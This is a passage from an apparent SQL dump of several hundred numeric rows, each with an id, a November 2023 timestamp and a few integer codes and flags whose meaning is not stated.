(7754, '2023-11-05 07:32:47', 1, 2053, 0, 1, 1),
(7755, '2023-11-05 08:11:02', 1, 2061, 0, 1, 1),
(7756, '2023-11-05 08:26:01', 1, 2061, 0, 1, 1),
(7757, '2023-11-05 08:34:02', 1, 2061, 0, 1, 1),
(7758, '2023-11-05 09:03:40', 1, 2061, 0, 1, 1),
(7759, '2023-11-05 09:31:54', 1, 2061, 0, 1, 1),
(7760, '2023-11-05 09:39:09', 1, 2061, 0, 1, 1),
(7761, '2023-11-05 09:40:26', 1, 2061, 0, 1, 1),
(7762, '2023-11-05 10:03:04', 1, 2061, 0, 1, 1),
(7763, '2023-11-05 10:14:31', 1, 2061, 0, 1, 1),
(7764, '2023-11-05 10:14:44', 1, 2061, 0, 1, 1),
(7765, '2023-11-05 10:29:08', 1, 2061, 0, 1, 1),
(7766, '2023-11-05 10:35:51', 1, 2061, 0, 1, 1),
(7767, '2023-11-05 10:54:07', 1, 2061, 0, 1, 1),
(7768, '2023-11-05 10:58:37', 1, 2061, 0, 1, 1),
(7769, '2023-11-05 11:01:15', 1, 2061, 0, 1, 1),
(7770, '2023-11-05 11:01:24', 1, 2061, 0, 1, 1),
(7771, '2023-11-05 11:44:19', 1, 2061, 0, 1, 1),
(7772, '2023-11-05 12:53:47', 1, 2061, 0, 1, 1),
(7773, '2023-11-05 13:13:10', 1, 2061, 0, 1, 1),
(7774, '2023-11-05 13:46:35', 1, 2054, 0, 1, 1),
(7775, '2023-11-05 13:59:40', 1, 2061, 0, 1, 1),
(7776, '2023-11-05 14:08:36', 1, 2061, 0, 1, 1),
(7777, '2023-11-05 14:08:48', 1, 2059, 0, 1, 1),
(7778, '2023-11-05 14:40:25', 1, 2060, 0, 1, 1),
(7779, '2023-11-05 14:51:53', 1, 2061, 0, 1, 1),
(7780, '2023-11-05 14:54:50', 1, 2061, 0, 1, 1),
(7781, '2023-11-05 15:04:11', 1, 2054, 0, 1, 1),
(7782, '2023-11-05 15:04:57', 1, 2061, 0, 1, 1),
(7783, '2023-11-05 15:10:05', 1, 2061, 0, 1, 1),
(7784, '2023-11-05 15:15:31', 1, 2061, 0, 1, 1),
(7785, '2023-11-05 15:38:57', 1, 2061, 0, 1, 1),
(7786, '2023-11-05 16:08:44', 1, 2061, 0, 1, 1),
(7787, '2023-11-05 16:11:55', 1, 2061, 0, 1, 1),
(7788, '2023-11-05 16:24:57', 1, 2061, 0, 1, 1),
(7789, '2023-11-05 16:40:13', 1, 2061, 0, 1, 1),
(7790, '2023-11-05 17:41:07', 1, 2061, 0, 1, 1),
(7791, '2023-11-05 17:50:50', 1, 2061, 0, 1, 1),
(7792, '2023-11-05 23:11:31', 1, 2058, 0, 1, 1),
(7793, '2023-11-06 05:46:20', 1, 2058, 0, 1, 1),
(7794, '2023-11-06 12:10:08', 1, 2064, 0, 1, 1),
(7795, '2023-11-06 12:50:07', 1, 2061, 0, 1, 1),
(7796, '2023-11-06 16:06:23', 1, 2064, 0, 1, 1),
(7797, '2023-11-06 16:48:23', 1, 2061, 0, 1, 1),
(7798, '2023-11-06 17:24:34', 1, 2059, 0, 1, 1),
(7799, '2023-11-06 17:24:36', 1, 2059, 0, 1, 1),
(7800, '2023-11-06 18:28:15', 1, 2061, 0, 1, 1),
(7801, '2023-11-06 18:29:59', 1, 2053, 0, 1, 1),
(7802, '2023-11-06 22:55:28', 1, 2061, 0, 1, 1),
(7803, '2023-11-07 00:44:48', 1, 2061, 0, 1, 1),
(7804, '2023-11-07 02:37:32', 1, 2064, 0, 1, 1),
(7805, '2023-11-07 03:07:45', 1, 2064, 0, 1, 1),
(7806, '2023-11-07 03:10:17', 1, 2062, 0, 1, 1),
(7807, '2023-11-07 03:10:19', 1, 2063, 0, 1, 1),
(7808, '2023-11-07 03:12:52', 1, 2061, 0, 1, 1),
(7809, '2023-11-07 03:12:53', 1, 2060, 0, 1, 1),
(7810, '2023-11-07 03:15:23', 1, 2059, 0, 1, 1),
(7811, '2023-11-07 03:15:25', 1, 2058, 0, 1, 1),
(7812, '2023-11-07 03:17:58', 1, 2055, 0, 1, 1),
(7813, '2023-11-07 03:17:59', 1, 2054, 0, 1, 1),
(7814, '2023-11-07 04:24:06', 1, 2059, 0, 1, 1),
(7815, '2023-11-07 04:50:13', 1, 2053, 0, 1, 1),
(7816, '2023-11-07 05:31:07', 1, 2064, 0, 1, 1),
(7817, '2023-11-07 05:41:18', 1, 2059, 0, 1, 1),
(7818, '2023-11-07 05:59:40', 1, 2055, 0, 1, 1),
(7819, '2023-11-07 06:00:42', 1, 2063, 0, 1, 1),
(7820, '2023-11-07 06:01:45', 1, 2053, 0, 1, 1),
(7821, '2023-11-07 06:02:48', 1, 2054, 0, 1, 1),
(7822, '2023-11-07 06:03:20', 1, 2060, 0, 1, 1),
(7823, '2023-11-07 06:03:32', 1, 2060, 0, 1, 1),
(7824, '2023-11-07 06:04:32', 1, 2061, 0, 1, 1),
(7825, '2023-11-07 06:04:45', 1, 2058, 0, 1, 1),
(7826, '2023-11-07 06:05:49', 1, 2064, 0, 1, 1),
(7827, '2023-11-07 06:06:10', 1, 2063, 0, 1, 1),
(7828, '2023-11-07 06:06:21', 1, 2062, 0, 1, 1),
(7829, '2023-11-07 06:06:35', 1, 2064, 0, 1, 1),
(7830, '2023-11-07 08:36:25', 1, 2061, 0, 1, 1),
(7831, '2023-11-07 08:36:29', 4, 2061, 1298, 1, 1),
(7832, '2023-11-07 08:36:30', 4, 2064, 1299, 1, 1),
(7833, '2023-11-07 08:36:30', 4, 2061, 1300, 1, 1),
(7834, '2023-11-07 08:36:31', 4, 2061, 1301, 1, 1),
(7835, '2023-11-07 08:36:31', 4, 2064, 1302, 1, 1),
(7836, '2023-11-07 14:47:07', 1, 2061, 0, 1, 1),
(7837, '2023-11-07 15:40:38', 1, 2054, 0, 1, 1),
(7838, '2023-11-07 17:03:49', 1, 2064, 0, 1, 1),
(7839, '2023-11-07 17:05:47', 1, 2064, 0, 1, 1),
(7840, '2023-11-07 17:05:58', 1, 2061, 0, 1, 1),
(7841, '2023-11-07 17:06:02', 1, 2063, 0, 1, 1),
(7842, '2023-11-07 17:06:11', 1, 2055, 0, 1, 1),
(7843, '2023-11-07 17:06:25', 1, 2059, 0, 1, 1),
(7844, '2023-11-07 17:06:31', 1, 2058, 0, 1, 1),
(7845, '2023-11-07 17:06:37', 1, 2062, 0, 1, 1),
(7846, '2023-11-07 17:06:46', 1, 2054, 0, 1, 1),
(7847, '2023-11-07 17:06:56', 1, 2060, 0, 1, 1),
(7848, '2023-11-07 17:08:19', 1, 2062, 0, 1, 1),
(7849, '2023-11-07 17:09:17', 1, 2060, 0, 1, 1),
(7850, '2023-11-07 17:09:18', 1, 2061, 0, 1, 1),
(7851, '2023-11-07 17:09:19', 1, 2063, 0, 1, 1),
(7852, '2023-11-07 17:11:14', 1, 2058, 0, 1, 1),
(7853, '2023-11-07 17:11:33', 1, 2055, 0, 1, 1),
(7854, '2023-11-07 17:11:49', 1, 2054, 0, 1, 1),
(7855, '2023-11-07 17:12:01', 1, 2059, 0, 1, 1),
(7856, '2023-11-07 17:16:47', 1, 2053, 0, 1, 1),
(7857, '2023-11-08 01:57:29', 1, 2061, 0, 1, 1),
(7858, '2023-11-08 02:34:16', 1, 2060, 0, 1, 1),
(7859, '2023-11-08 03:13:10', 1, 2062, 0, 1, 1),
(7860, '2023-11-08 03:28:28', 1, 2054, 0, 1, 1),
(7861, '2023-11-08 05:12:27', 1, 2054, 0, 1, 1),
(7862, '2023-11-08 06:13:03', 1, 2059, 0, 1, 1),
(7863, '2023-11-08 10:12:58', 1, 2063, 0, 1, 1),
(7864, '2023-11-08 11:07:48', 1, 2063, 0, 1, 1),
(7865, '2023-11-08 11:42:32', 1, 2059, 0, 1, 1),
(7866, '2023-11-08 17:06:17', 1, 2053, 0, 1, 1),
(7867, '2023-11-08 17:07:35', 1, 2061, 0, 1, 1),
(7868, '2023-11-08 22:22:25', 1, 2063, 0, 1, 1),
(7869, '2023-11-09 01:09:29', 1, 2064, 0, 1, 1),
(7870, '2023-11-09 02:10:13', 1, 2064, 0, 1, 1),
(7871, '2023-11-09 03:42:44', 1, 2062, 0, 1, 1),
(7872, '2023-11-09 05:57:37', 1, 2062, 0, 1, 1),
(7873, '2023-11-09 06:10:21', 1, 2053, 0, 1, 1),
(7874, '2023-11-09 08:32:54', 1, 2053, 0, 1, 1),
(7875, '2023-11-09 10:40:31', 1, 2062, 0, 1, 1),
(7876, '2023-11-09 13:25:20', 1, 2060, 0, 1, 1),
(7877, '2023-11-09 13:25:23', 4, 2060, 1307, 1, 1),
(7878, '2023-11-09 17:46:52', 4, 2061, 1308, 1, 1),
(7879, '2023-11-09 19:54:29', 1, 2058, 0, 1, 1),
(7880, '2023-11-10 00:48:54', 1, 2063, 0, 1, 1),
(7881, '2023-11-10 03:29:25', 1, 2062, 0, 1, 1),
(7882, '2023-11-10 05:08:26', 1, 2055, 0, 1, 1),
(7883, '2023-11-10 06:28:27', 1, 2062, 0, 1, 1),
(7884, '2023-11-10 06:28:29', 1, 2054, 0, 1, 1),
(7885, '2023-11-10 06:28:29', 1, 2060, 0, 1, 1),
(7886, '2023-11-10 06:28:30', 1, 2055, 0, 1, 1),
(7887, '2023-11-10 06:28:32', 1, 2063, 0, 1, 1),
(7888, '2023-11-10 06:28:33', 1, 2064, 0, 1, 1),
(7889, '2023-11-10 06:28:35', 1, 2058, 0, 1, 1),
(7890, '2023-11-10 06:28:44', 1, 2061, 0, 1, 1),
(7891, '2023-11-10 06:28:45', 1, 2059, 0, 1, 1),
(7892, '2023-11-10 08:52:23', 1, 2064, 0, 1, 1),
(7893, '2023-11-10 10:28:20', 1, 2061, 0, 1, 1),
(7894, '2023-11-10 10:34:04', 1, 2060, 0, 1, 1),
(7895, '2023-11-10 11:23:45', 1, 2058, 0, 1, 1),
(7896, '2023-11-10 11:27:07', 1, 2061, 0, 1, 1),
(7897, '2023-11-10 11:32:58', 1, 2064, 0, 1, 1),
(7898, '2023-11-10 11:54:40', 1, 2055, 0, 1, 1),
(7899, '2023-11-10 12:17:32', 1, 2055, 0, 1, 1),
(7900, '2023-11-10 12:17:32', 1, 2059, 0, 1, 1),
(7901, '2023-11-10 12:17:32', 1, 2062, 0, 1, 1),
(7902, '2023-11-10 12:17:33', 1, 2063, 0, 1, 1),
(7903, '2023-11-10 12:17:33', 1, 2058, 0, 1, 1),
(7904, '2023-11-10 12:17:35', 1, 2064, 0, 1, 1),
(7905, '2023-11-10 12:17:36', 1, 2054, 0, 1, 1),
(7906, '2023-11-10 12:17:37', 1, 2061, 0, 1, 1),
(7907, '2023-11-10 12:18:02', 1, 2053, 0, 1, 1),
(7908, '2023-11-10 12:21:45', 1, 2060, 0, 1, 1),
(7909, '2023-11-10 13:56:08', 1, 2059, 0, 1, 1),
(7910, '2023-11-10 14:13:22', 1, 2054, 0, 1, 1),
(7911, '2023-11-10 14:46:20', 1, 2054, 0, 1, 1),
(7912, '2023-11-10 16:07:07', 4, 2061, 1310, 1, 1),
(7913, '2023-11-10 16:45:43', 1, 2054, 0, 1, 1),
(7914, '2023-11-10 17:15:31', 1, 2059, 0, 1, 1),
(7915, '2023-11-10 21:13:17', 1, 2062, 0, 1, 1),
(7916, '2023-11-10 21:13:49', 1, 2063, 0, 1, 1),
(7917, '2023-11-10 21:33:14', 1, 2059, 0, 1, 1),
(7918, '2023-11-10 22:06:11', 1, 2058, 0, 1, 1),
(7919, '2023-11-10 23:11:38', 1, 2059, 0, 1, 1),
(7920, '2023-11-11 00:48:44', 1, 2059, 0, 1, 1),
(7921, '2023-11-11 01:12:01', 1, 2054, 0, 1, 1),
(7922, '2023-11-11 01:13:27', 1, 2059, 0, 1, 1),
(7923, '2023-11-11 01:20:52', 1, 2062, 0, 1, 1),
(7924, '2023-11-11 01:21:06', 1, 2063, 0, 1, 1),
(7925, '2023-11-11 03:18:02', 1, 2059, 0, 1, 1),
(7926, '2023-11-11 04:17:02', 1, 2059, 0, 1, 1),
(7927, '2023-11-11 04:53:57', 1, 2055, 0, 1, 1),
(7928, '2023-11-11 05:06:48', 1, 2061, 0, 1, 1),
(7929, '2023-11-11 08:11:10', 1, 2058, 0, 1, 1),
(7930, '2023-11-11 11:43:31', 1, 2058, 0, 1, 1),
(7931, '2023-11-11 13:00:07', 1, 2061, 0, 1, 1),
(7932, '2023-11-11 13:00:07', 1, 2059, 0, 1, 1),
(7933, '2023-11-11 13:25:28', 1, 2058, 0, 1, 1),
(7934, '2023-11-11 14:02:58', 1, 2060, 0, 1, 1),
(7935, '2023-11-11 14:09:02', 1, 2063, 0, 1, 1),
(7936, '2023-11-11 14:24:52', 1, 2058, 0, 1, 1),
(7937, '2023-11-11 14:52:28', 1, 2055, 0, 1, 1),
(7938, '2023-11-11 15:09:09', 1, 2061, 0, 1, 1),
(7939, '2023-11-11 15:41:27', 1, 2061, 0, 1, 1),
(7940, '2023-11-11 16:09:02', 1, 2062, 0, 1, 1),
(7941, '2023-11-11 17:08:05', 1, 2054, 0, 1, 1),
(7942, '2023-11-11 17:21:37', 1, 2059, 0, 1, 1),
(7943, '2023-11-11 17:33:23', 1, 2064, 0, 1, 1),
(7944, '2023-11-11 17:52:43', 1, 2059, 0, 1, 1),
(7945, '2023-11-11 20:12:44', 1, 2064, 0, 1, 1),
(7946, '2023-11-11 21:47:19', 1, 2064, 0, 1, 1),
(7947, '2023-11-11 22:25:43', 1, 2059, 0, 1, 1),
(7948, '2023-11-11 22:31:03', 1, 2060, 0, 1, 1),
(7949, '2023-11-11 22:36:48', 1, 2063, 0, 1, 1),
(7950, '2023-11-11 22:51:38', 1, 2058, 0, 1, 1),
(7951, '2023-11-11 22:54:33', 1, 2059, 0, 1, 1),
(7952, '2023-11-11 23:06:22', 1, 2059, 0, 1, 1),
(7953, '2023-11-11 23:17:50', 1, 2055, 0, 1, 1),
(7954, '2023-11-12 00:00:03', 1, 2061, 0, 1, 1),
(7955, '2023-11-12 00:24:09', 1, 2062, 0, 1, 1),
(7956, '2023-11-12 00:33:53', 1, 2059, 0, 1, 1),
(7957, '2023-11-12 01:12:55', 1, 2054, 0, 1, 1),
(7958, '2023-11-12 01:16:22', 1, 2054, 0, 1, 1),
(7959, '2023-11-12 01:28:45', 1, 2059, 0, 1, 1),
(7960, '2023-11-12 01:39:06', 1, 2064, 0, 1, 1),
(7961, '2023-11-12 03:00:37', 1, 2054, 0, 1, 1),
(7962, '2023-11-12 03:13:48', 1, 2064, 0, 1, 1),
(7963, '2023-11-12 07:28:55', 1, 2058, 0, 1, 1),
(7964, '2023-11-12 10:33:04', 1, 2060, 0, 1, 1),
(7965, '2023-11-12 10:33:05', 4, 2060, 1312, 1, 1),
(7966, '2023-11-12 11:10:45', 1, 2063, 0, 1, 1),
(7967, '2023-11-12 13:49:24', 1, 2058, 0, 1, 1),
(7968, '2023-11-12 15:00:37', 1, 2059, 0, 1, 1),
(7969, '2023-11-12 15:18:53', 1, 2062, 0, 1, 1),
(7970, '2023-11-12 15:31:00', 1, 2064, 0, 1, 1),
(7971, '2023-11-12 15:41:23', 1, 2062, 0, 1, 1),
(7972, '2023-11-12 16:55:03', 1, 2059, 0, 1, 1),
(7973, '2023-11-12 17:59:27', 1, 2063, 0, 1, 1),
(7974, '2023-11-12 22:31:28', 1, 2059, 0, 1, 1),
(7975, '2023-11-12 22:42:32', 1, 2053, 0, 1, 1),
(7976, '2023-11-12 23:00:00', 1, 2055, 0, 1, 1),
(7977, '2023-11-13 00:51:25', 1, 2055, 0, 1, 1),
(7978, '2023-11-13 02:04:53', 1, 2063, 0, 1, 1),
(7979, '2023-11-13 02:57:27', 1, 2064, 0, 1, 1),
(7980, '2023-11-13 03:57:42', 1, 2061, 0, 1, 1),
(7981, '2023-11-13 04:10:00', 1, 2059, 0, 1, 1),
(7982, '2023-11-13 04:32:28', 1, 2054, 0, 1, 1),
(7983, '2023-11-13 05:44:45', 1, 2063, 0, 1, 1),
(7984, '2023-11-13 06:15:44', 1, 2058, 0, 1, 1),
(7985, '2023-11-13 06:15:54', 1, 2064, 0, 1, 1),
(7986, '2023-11-13 06:16:10', 1, 2062, 0, 1, 1),
(7987, '2023-11-13 06:16:16', 1, 2055, 0, 1, 1),
(7988, '2023-11-13 06:16:25', 1, 2054, 0, 1, 1),
(7989, '2023-11-13 06:16:30', 1, 2059, 0, 1, 1),
(7990, '2023-11-13 06:16:33', 1, 2060, 0, 1, 1),
(7991, '2023-11-13 06:16:36', 1, 2063, 0, 1, 1),
(7992, '2023-11-13 06:16:43', 1, 2061, 0, 1, 1),
(7993, '2023-11-13 06:17:10', 1, 2058, 0, 1, 1),
(7994, '2023-11-13 06:17:20', 1, 2064, 0, 1, 1),
(7995, '2023-11-13 06:17:30', 1, 2062, 0, 1, 1),
(7996, '2023-11-13 06:17:33', 1, 2055, 0, 1, 1),
(7997, '2023-11-13 06:17:41', 1, 2059, 0, 1, 1),
(7998, '2023-11-13 06:17:46', 1, 2054, 0, 1, 1),
(7999, '2023-11-13 06:17:49', 1, 2063, 0, 1, 1),
(8000, '2023-11-13 06:17:51', 1, 2061, 0, 1, 1),
(8001, '2023-11-13 06:17:55', 1, 2060, 0, 1, 1),
(8002, '2023-11-13 06:18:11', 1, 2053, 0, 1, 1),
(8003, '2023-11-13 06:53:03', 1, 2054, 0, 1, 1),
(8004, '2023-11-13 06:53:06', 1, 2055, 0, 1, 1),
(8005, '2023-11-13 06:53:19', 1, 2064, 0, 1, 1),
(8006, '2023-11-13 06:53:22', 1, 2063, 0, 1, 1),
(8007, '2023-11-13 06:53:24', 1, 2062, 0, 1, 1),
(8008, '2023-11-13 06:53:27', 1, 2060, 0, 1, 1),
(8009, '2023-11-13 06:53:30', 1, 2059, 0, 1, 1),
(8010, '2023-11-13 06:53:31', 1, 2061, 0, 1, 1),
(8011, '2023-11-13 06:53:33', 1, 2058, 0, 1, 1),
(8012, '2023-11-13 07:48:22', 1, 2060, 0, 1, 1),
(8013, '2023-11-13 08:08:08', 1, 2061, 0, 1, 1),
(8014, '2023-11-13 08:16:49', 1, 2054, 0, 1, 1),
(8015, '2023-11-13 08:16:52', 1, 2059, 0, 1, 1),
(8016, '2023-11-13 08:16:54', 1, 2061, 0, 1, 1),
(8017, '2023-11-13 08:16:57', 1, 2058, 0, 1, 1),
(8018, '2023-11-13 08:29:02', 1, 2063, 0, 1, 1),
(8019, '2023-11-13 08:29:04', 1, 2063, 0, 1, 1),
(8020, '2023-11-13 08:45:38', 1, 2059, 0, 1, 1),
(8021, '2023-11-13 09:42:38', 1, 2061, 0, 1, 1),
(8022, '2023-11-13 09:57:38', 1, 2063, 0, 1, 1),
(8023, '2023-11-13 09:57:42', 1, 2061, 0, 1, 1),
(8024, '2023-11-13 09:57:45', 1, 2055, 0, 1, 1),
(8025, '2023-11-13 09:57:50', 1, 2064, 0, 1, 1),
(8026, '2023-11-13 09:57:54', 1, 2060, 0, 1, 1),
(8027, '2023-11-13 09:57:58', 1, 2059, 0, 1, 1),
(8028, '2023-11-13 09:58:06', 1, 2058, 0, 1, 1),
(8029, '2023-11-13 09:59:16', 1, 2062, 0, 1, 1),
(8030, '2023-11-13 09:59:21', 1, 2054, 0, 1, 1),
(8031, '2023-11-13 10:02:09', 1, 2061, 0, 1, 1),
(8032, '2023-11-13 10:02:25', 1, 2054, 0, 1, 1),
(8033, '2023-11-13 10:02:33', 1, 2059, 0, 1, 1),
(8034, '2023-11-13 10:02:37', 1, 2058, 0, 1, 1),
(8035, '2023-11-13 10:02:45', 1, 2053, 0, 1, 1),
(8036, '2023-11-13 10:02:49', 1, 2063, 0, 1, 1),
(8037, '2023-11-13 10:02:53', 1, 2062, 0, 1, 1),
(8038, '2023-11-13 10:02:57', 1, 2055, 0, 1, 1),
(8039, '2023-11-13 10:03:01', 1, 2060, 0, 1, 1),
(8040, '2023-11-13 10:03:05', 1, 2064, 0, 1, 1),
(8041, '2023-11-13 10:39:26', 1, 2059, 0, 1, 1),
(8042, '2023-11-13 12:24:38', 1, 2060, 0, 1, 1),
(8043, '2023-11-13 14:11:39', 1, 2063, 0, 1, 1),
(8044, '2023-11-13 14:34:16', 1, 2061, 0, 1, 1),
(8045, '2023-11-13 16:06:49', 1, 2064, 0, 1, 1),
(8046, '2023-11-13 17:54:32', 1, 2058, 0, 1, 1),
(8047, '2023-11-13 17:59:12', 1, 2061, 0, 1, 1),
(8048, '2023-11-13 18:08:43', 1, 2054, 0, 1, 1),
(8049, '2023-11-13 21:16:35', 1, 2061, 0, 1, 1),
(8050, '2023-11-13 23:08:39', 1, 2062, 0, 1, 1),
(8051, '2023-11-14 00:50:34', 4, 2061, 1315, 1, 1),
(8052, '2023-11-14 00:59:09', 1, 2055, 0, 1, 1),
(8053, '2023-11-14 01:36:18', 1, 2061, 0, 1, 1),
(8054, '2023-11-14 01:36:21', 4, 2064, 1316, 1, 1),
(8055, '2023-11-14 01:36:21', 4, 2061, 1317, 1, 1),
(8056, '2023-11-14 01:36:22', 4, 2061, 1319, 1, 1),
(8057, '2023-11-14 01:36:22', 4, 2064, 1318, 1, 1),
(8058, '2023-11-14 01:41:29', 1, 2059, 0, 1, 1),
(8059, '2023-11-14 01:50:20', 1, 2058, 0, 1, 1),
(8060, '2023-11-14 06:19:34', 1, 2059, 0, 1, 1),
(8061, '2023-11-14 09:15:03', 1, 2060, 0, 1, 1),
(8062, '2023-11-14 10:39:46', 1, 2060, 0, 1, 1),
(8063, '2023-11-14 12:02:48', 1, 2054, 0, 1, 1),
(8064, '2023-11-14 12:02:49', 1, 2059, 0, 1, 1),
(8065, '2023-11-14 12:02:50', 1, 2055, 0, 1, 1),
(8066, '2023-11-14 12:02:51', 1, 2062, 0, 1, 1),
(8067, '2023-11-14 12:02:52', 1, 2060, 0, 1, 1),
(8068, '2023-11-14 12:02:52', 1, 2061, 0, 1, 1),
(8069, '2023-11-14 12:02:54', 1, 2064, 0, 1, 1),
(8070, '2023-11-14 12:02:55', 1, 2058, 0, 1, 1),
(8071, '2023-11-14 12:02:59', 1, 2063, 0, 1, 1),
(8072, '2023-11-14 12:03:02', 1, 2053, 0, 1, 1),
(8073, '2023-11-14 13:15:20', 1, 2059, 0, 1, 1),
(8074, '2023-11-14 14:14:24', 1, 2054, 0, 1, 1),
(8075, '2023-11-14 14:38:39', 1, 2061, 0, 1, 1),
(8076, '2023-11-14 16:20:44', 1, 2062, 0, 1, 1),
(8077, '2023-11-14 16:23:25', 1, 2058, 0, 1, 1),
(8078, '2023-11-14 19:23:00', 1, 2059, 0, 1, 1),
(8079, '2023-11-14 20:11:30', 1, 2062, 0, 1, 1),
(8080, '2023-11-14 22:40:55', 1, 2059, 0, 1, 1),
(8081, '2023-11-14 22:40:55', 1, 2062, 0, 1, 1),
(8082, '2023-11-14 22:40:56', 1, 2061, 0, 1, 1),
(8083, '2023-11-14 22:40:57', 1, 2060, 0, 1, 1),
(8084, '2023-11-14 22:40:58', 1, 2055, 0, 1, 1),
(8085, '2023-11-14 22:41:00', 1, 2054, 0, 1, 1),
(8086, '2023-11-14 22:41:03', 1, 2063, 0, 1, 1),
(8087, '2023-11-14 22:41:05', 1, 2064, 0, 1, 1),
(8088, '2023-11-14 22:41:08', 1, 2058, 0, 1, 1),
(8089, '2023-11-15 02:15:04', 1, 2064, 0, 1, 1),
(8090, '2023-11-15 04:04:30', 1, 2062, 0, 1, 1),
(8091, '2023-11-15 07:12:30', 1, 2054, 0, 1, 1),
(8092, '2023-11-15 07:18:01', 1, 2064, 0, 1, 1),
(8093, '2023-11-15 07:18:03', 1, 2064, 0, 1, 1),
(8094, '2023-11-15 08:09:46', 1, 2064, 0, 1, 1),
(8095, '2023-11-15 09:38:53', 1, 2060, 0, 1, 1),
(8096, '2023-11-15 10:46:32', 1, 2059, 0, 1, 1),
(8097, '2023-11-15 11:22:38', 1, 2053, 0, 1, 1),
(8098, '2023-11-15 12:32:20', 1, 2061, 0, 1, 1),
(8099, '2023-11-15 15:07:17', 1, 2062, 0, 1, 1),
(8100, '2023-11-15 15:12:57', 1, 2062, 0, 1, 1),
(8101, '2023-11-15 16:55:03', 1, 2061, 0, 1, 1),
(8102, '2023-11-15 17:35:34', 1, 2061, 0, 1, 1),
(8103, '2023-11-15 21:40:08', 1, 2063, 0, 1, 1),
(8104, '2023-11-16 03:21:49', 1, 2054, 0, 1, 1),
(8105, '2023-11-16 05:02:50', 1, 2054, 0, 1, 1),
(8106, '2023-11-16 08:11:58', 1, 2060, 0, 1, 1),
(8107, '2023-11-16 09:17:33', 1, 2064, 0, 1, 1),
(8108, '2023-11-16 09:49:51', 1, 2059, 0, 1, 1),
(8109, '2023-11-16 10:18:05', 1, 2054, 0, 1, 1),
(8110, '2023-11-16 10:18:13', 1, 2059, 0, 1, 1),
(8111, '2023-11-16 10:18:20', 1, 2061, 0, 1, 1),
(8112, '2023-11-16 10:18:26', 1, 2058, 0, 1, 1),
(8113, '2023-11-16 11:38:34', 1, 2063, 0, 1, 1),
(8114, '2023-11-16 12:05:12', 1, 2055, 0, 1, 1),
(8115, '2023-11-16 12:30:23', 1, 2064, 0, 1, 1),
(8116, '2023-11-16 12:30:30', 4, 2064, 1322, 1, 1),
(8117, '2023-11-16 12:30:56', 1, 2064, 0, 1, 1),
(8118, '2023-11-16 12:31:00', 4, 2064, 1323, 1, 1),
(8119, '2023-11-16 12:31:19', 1, 2064, 0, 1, 1),
(8120, '2023-11-16 12:31:24', 4, 2064, 1324, 1, 1),
(8121, '2023-11-16 12:31:40', 1, 2064, 0, 1, 1),
(8122, '2023-11-16 12:31:45', 4, 2064, 1325, 1, 1),
(8123, '2023-11-16 12:32:02', 1, 2064, 0, 1, 1),
(8124, '2023-11-16 12:32:08', 4, 2064, 1326, 1, 1),
(8125, '2023-11-16 12:32:23', 1, 2064, 0, 1, 1),
(8126, '2023-11-16 12:32:27', 4, 2064, 1327, 1, 1),
(8127, '2023-11-16 13:00:39', 1, 2061, 0, 1, 1),
(8128, '2023-11-16 14:10:58', 1, 2061, 0, 1, 1),
(8129, '2023-11-16 15:31:36', 1, 2064, 0, 1, 1),
(8130, '2023-11-16 19:24:55', 1, 2058, 0, 1, 1),
(8131, '2023-11-16 20:23:58', 1, 2059, 0, 1, 1),
(8132, '2023-11-16 21:10:12', 1, 2061, 0, 1, 1),
(8133, '2023-11-16 21:19:43', 1, 2059, 0, 1, 1),
(8134, '2023-11-16 23:07:50', 1, 2060, 0, 1, 1),
(8135, '2023-11-17 04:24:57', 1, 2054, 0, 1, 1),
(8136, '2023-11-17 04:29:54', 1, 2062, 0, 1, 1),
(8137, '2023-11-17 08:03:02', 1, 2059, 0, 1, 1),
(8138, '2023-11-17 09:24:55', 1, 2060, 0, 1, 1),
(8139, '2023-11-17 09:40:18', 1, 2060, 0, 1, 1),
(8140, '2023-11-17 11:34:07', 1, 2060, 0, 1, 1),
(8141, '2023-11-17 11:35:05', 1, 2060, 0, 1, 1),
(8142, '2023-11-17 20:01:08', 1, 2055, 0, 1, 1),
(8143, '2023-11-17 23:47:50', 1, 2058, 0, 1, 1),
(8144, '2023-11-17 23:49:29', 1, 2063, 0, 1, 1),
(8145, '2023-11-18 01:50:36', 1, 2058, 0, 1, 1),
(8146, '2023-11-18 01:56:12', 1, 2059, 0, 1, 1),
(8147, '2023-11-18 02:05:37', 1, 2053, 0, 1, 1),
(8148, '2023-11-18 03:25:20', 1, 2064, 0, 1, 1),
(8149, '2023-11-18 03:48:22', 1, 2054, 0, 1, 1),
(8150, '2023-11-18 03:53:00', 1, 2054, 0, 1, 1),
(8151, '2023-11-18 03:55:42', 1, 2055, 0, 1, 1),
(8152, '2023-11-18 03:58:17', 1, 2054, 0, 1, 1),
(8153, '2023-11-18 04:00:41', 1, 2055, 0, 1, 1),
(8154, '2023-11-18 04:17:13', 1, 2054, 0, 1, 1),
(8155, '2023-11-18 04:19:50', 1, 2055, 0, 1, 1),
(8156, '2023-11-18 04:32:30', 1, 2064, 0, 1, 1),
(8157, '2023-11-18 04:38:00', 1, 2064, 0, 1, 1),
(8158, '2023-11-18 05:04:31', 1, 2064, 0, 1, 1),
(8159, '2023-11-18 05:40:48', 1, 2063, 0, 1, 1),
(8160, '2023-11-18 06:48:53', 1, 2064, 0, 1, 1),
(8161, '2023-11-18 06:59:29', 1, 2059, 0, 1, 1),
(8162, '2023-11-18 07:28:04', 1, 2055, 0, 1, 1),
(8163, '2023-11-18 07:28:19', 1, 2064, 0, 1, 1),
(8164, '2023-11-18 07:28:25', 1, 2061, 0, 1, 1),
(8165, '2023-11-18 07:28:31', 1, 2058, 0, 1, 1),
(8166, '2023-11-18 10:00:03', 1, 2060, 0, 1, 1),
(8167, '2023-11-18 10:07:00', 1, 2054, 0, 1, 1),
(8168, '2023-11-18 10:24:21', 1, 2058, 0, 1, 1),
(8169, '2023-11-18 11:03:57', 1, 2060, 0, 1, 1),
(8170, '2023-11-18 12:23:14', 1, 2058, 0, 1, 1),
(8171, '2023-11-18 12:23:16', 1, 2058, 0, 1, 1),
(8172, '2023-11-18 14:01:15', 1, 2055, 0, 1, 1),
(8173, '2023-11-18 15:08:43', 1, 2061, 0, 1, 1),
(8174, '2023-11-18 18:51:02', 1, 2062, 0, 1, 1),
(8175, '2023-11-19 02:51:55', 1, 2054, 0, 1, 1),
(8176, '2023-11-19 03:20:35', 1, 2059, 0, 1, 1),
(8177, '2023-11-19 08:11:05', 1, 2062, 0, 1, 1),
(8178, '2023-11-19 10:57:11', 1, 2064, 0, 1, 1),
(8179, '2023-11-19 23:07:17', 1, 2054, 0, 1, 1),
(8180, '2023-11-19 23:12:32', 1, 2063, 0, 1, 1),
(8181, '2023-11-19 23:12:34', 1, 2060, 0, 1, 1),
